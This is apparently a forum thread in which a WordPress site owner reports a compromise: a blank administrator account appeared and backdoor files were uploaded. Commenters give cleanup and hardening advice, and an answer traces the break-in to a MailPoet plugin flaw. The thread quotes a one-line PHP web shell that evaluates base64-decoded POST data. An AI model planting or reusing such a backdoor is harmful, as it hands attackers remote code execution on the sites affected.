# Wordpress admin hacked

Tags: php, wordpress

I've received an email from wordfence plugin that a user (with empty username) has been logged in in admin area.

```
A user with username " " who has administrator access signed in to your WordPress site.
```

In users there's a new user with no data at all. Email, username, etc, all empty. This is the first issue. The second issue is probably the result of this one....

Some php files have been uploaded in /wp-content/uploads/2014/03 folder, a dir.php and a 841rewb3v4x.php

dir.php has the following code

```
<?php    eval(base64_decode($_POST['n358cfa']));?>
```

The other file has encoded php code which can be found here http://www.unphp.net/decode/f845fc88a23b7a59b3f5c04ed09cf7b0/

If someone knows, what that code does? Also, what i should do about that? (i've already deleted the user and the files).

Thanks!

Comment: thats a security risk. seems there is some leak in signing up system.

Comment: try http://wpscan.org/ to check for vulnerability .. there might be leaks in your registeration system and/or some plugins

Comment: If you've removed the user and deleted the files, then there's nothing more you can do, except maybe modify the PHP create-account form to disallow users with no email address/password...

Comment: just removing the user and deleting files will not save you from future hack attempts .. this had showed that there is some loop hole .. try to fix that .. and as you asked 'eval' runs a function passed to it.. so the hacker was trying to post a function to file and run it ..

Comment: I've had a similar issue with an old version of a plugin on a out-dated test site that was not included in my regular patching routine. I fixed it by deleting all the newly uploaded stuff, checking all files for last changed date to make sure no other code was adde somewhere, updating WP and plugins, removing unused plugins, and adding a two-factor authentication for admin accounts.

Answer (score 0):

Finally, some important info about this issue! This was a result of a huge vulnerability of mailpoet plugin.

You can see more details here:

http://blog.sucuri.net/2014/07/mailpoet-vulnerability-exploited-in-the-wild-breaking-thousands-of-wordpress-sites.html

http://blog.sucuri.net/2014/07/malware-infection-breaking-wordpress-sites.html